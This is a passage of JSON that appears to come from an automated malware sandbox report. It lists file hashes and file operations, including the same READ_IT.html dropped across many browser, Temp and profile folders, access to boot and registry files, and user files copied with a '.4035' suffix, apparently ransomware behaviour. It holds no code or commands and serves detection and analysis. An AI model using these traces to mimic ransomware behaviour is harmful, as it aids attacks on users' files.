"f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\id\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hu\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hu\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hr\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hr\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\hi\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\hi\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\he\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\he\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fr\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fr\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fil\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fil\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\fi\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\fi\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\es\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\es\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\en\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\en\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\el\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\el\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\de\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\de\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\da\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\da\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\cs\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\cs\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ca\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ca\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\bg\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\bg\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\ar\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\ar\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\outlook logging\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\outlook logging\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Low\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\low\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\History\\History.IE5\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\history\\history.ie5\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\Cookies\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cookies\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\thumbnails\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\thumbnails\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\startupCache\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\startupcache\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\bootmgr", "hashes": [], "norm_filename": "c:\\bootmgr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\BOOTSECT.BAK", "hashes": [], "norm_filename": "c:\\bootsect.bak", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\hiberfil.sys", "hashes": [], "norm_filename": "c:\\hiberfil.sys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\pagefile.sys", "hashes": [], "norm_filename": "c:\\pagefile.sys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\NTUSER.DAT", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\ntuser.dat.LOG1", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.dat.log1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\ntuser.dat.LOG2", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.dat.log2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\Favorites.vss", "hashes": [ { "md5_hash": "07e593200b1b6d5fb49923941f54ae70", "sha1_hash": "9d3863811bff04541156538a817e44a9c96d5808", "sha256_hash": "92704ace6eb1bcd48171014583d1773925b81177b28edb996f9d723fc0839602", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\favorites.vss", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\parent.lock", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\parent.lock", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\indexedDB\\moz-safe-about+home\\.metadata", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\.metadata", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst2635.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2635.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst28B4.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst28b4.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst2960.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2960.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst2F3A.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2f3a.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst4105.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst4105.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst423D.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst423d.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst4558.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst4558.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst47F7.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst47f7.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst531E.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst531e.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst5511.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst5511.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst5994.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst5994.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst5CBF.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst5cbf.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst7953.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst7953.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst7F0E.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst7f0e.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\bst7F4C.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst7f4c.tmp", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\CVRC37D.tmp.cvr", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cvrc37d.tmp.cvr", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\CVRC503.tmp.cvr", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\cvrc503.tmp.cvr", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\fxsapidebuglogfile.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\RD8CF3.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\rd8cf3.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\uk\\messages.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\uk\\messages.json", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.sbstore", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\safebrowsing\\goog-phish-shavar.sbstore", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\Favorites.vss.4035", "hashes": [ { "md5_hash": "07e593200b1b6d5fb49923941f54ae70", "sha1_hash": "9d3863811bff04541156538a817e44a9c96d5808", "sha256_hash": "92704ace6eb1bcd48171014583d1773925b81177b28edb996f9d723fc0839602", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\favorites.vss.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\parent.lock.4035", "hashes": [ { "md5_hash": "a10770cb938bae102f32772124ffb4cc", "sha1_hash": 